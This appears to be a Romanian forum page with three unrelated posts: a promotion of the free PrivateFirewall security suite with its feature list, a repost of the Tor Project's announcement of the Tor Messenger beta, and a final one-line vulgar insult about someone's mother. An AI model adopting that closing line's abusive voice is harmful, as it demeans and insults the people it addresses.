Scuze daca este repost, nu am gasit postat. PS: il folosesc si e OK. Internetul poate fi gratuit, dar cu totii stim ca pentru a face tranzactii online, cumpara muzica, software, carti sau pur si simplu sa navigam pe Web este un pret de platit. Pentru a combate amenintarile online, programele firewall, anti-virus si anti-spyware au devenit investitii esentiale pentru orice computer aflat acasa sau la munca. Aceste programe monitorizeaza si controleaza accesul la sistem, scaneaza si elimina softurile de spionat si alte tipuri de malware. Compania Privacyware acopera aceste nevoi prin PrivateFirewall ― o solutie proactiva cu aparare multi-strat pentru sistemele Windows, atat Desktop cat si Server. Mai mult – PrivateFirewall este absolut GRATUIT. Product Feature - Privatefirewall Windows 7, Vista & XP support - YES, ALL Zero-hour anti-virus protection - YES Zero-hour spyware protection - YES Zero-hour malware protection - YES IPv6/IPv4 packet filtering - YES Behavioral hacker protection - YES Personal Firewall - YES Website/IP filtering - YES Anti-logger module - YES Advanced Application Security - YES Advanced Reporting module - YES Process Security - YES Registry protection - YES System Anomaly Detection - YES Email Anomaly Detection - YES PrivateFirewall a reusit un rezultat foarte bun: 98% in testele Matousec. Avand in vedere ca este si gratuit, merita sa-l incercati. Sursa: faravirusi.com Download: privatefirewall.exe

Tor Messenger Beta: Chat over Tor, Easily Posted October 29th, 2015 by sukhbir in Today we are releasing a new, beta version of Tor Messenger, based on Instantbird, an instant messaging client developed in the Mozilla community. What is it? Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enablesOff-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages. What it isn't... Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor.We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too. Why Instantbird? We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice -- its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users. Current Status Today we are releasing a beta version with which we hope to gain both usability and security related feedback. There have been three previous alpha releases to the mailing lists that have already helped smooth out some of the rougher edges. Downloads Linux (32-bit)Linux (64-bit)WindowsOS Xsha256sums.txt sha256sums.txt.ascThe sha256sums.txt file containing hashes of the bundles is signed with the key0x6887935AB297B391 (fingerprint: 3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391). Instructions On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory. Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended. Source Code We are doing automated builds of Tor Messenger for all platforms.The Linux builds are reproducible: anyone who builds Tor Messenger for Linux should have byte-for-byte identical binaries compared with other builds from a given source. You can build it yourself and let us know if you encounter any problems or cannot match our build. The Windows and OS X builds are not completely reproducible yet but we areworking on it. What's to Come Our current focus is security, robustness and user experience. We will be fixing bugs and releasing updates as appropriate, and in the future, we plan on pairing releases with Mozilla's Extended Support Release (ESR) cycle. We have some ideas on where to take Tor Messenger but we would like to hear what you have to say. Some possibilities include: Reproducible builds for Windows and OS X Sandboxing Automatic updates Improved Tor support OTR over Twitter DMs Produce (and distribute) internationalized builds Secure multi-party communication (np1sec) Encrypted file-transfers Usability study How To Help Give it a try and provide feedback, requests, and file bugs (choose the "Tor Messenger" component). If you are a developer, help us close all our tickets or help us review ourdesign doc. As always, we are idling on IRC in #tor-dev (OFTC) (nicks: arlolra; boklm; sukhe) and subscribed to the tor-talk/dev mailing lists.Please note that this release is for users who would like to help us with testing the product but at the same time who also understand the risks involved in using beta software.Thanks and we hope you enjoy Tor Messenger! Sursa: https://blog.torproject.org/blog/tor-messenger-beta-chat-over-tor-easily

Din pacate tatal meu a murit, pentru ca a futut-o pe mama ta.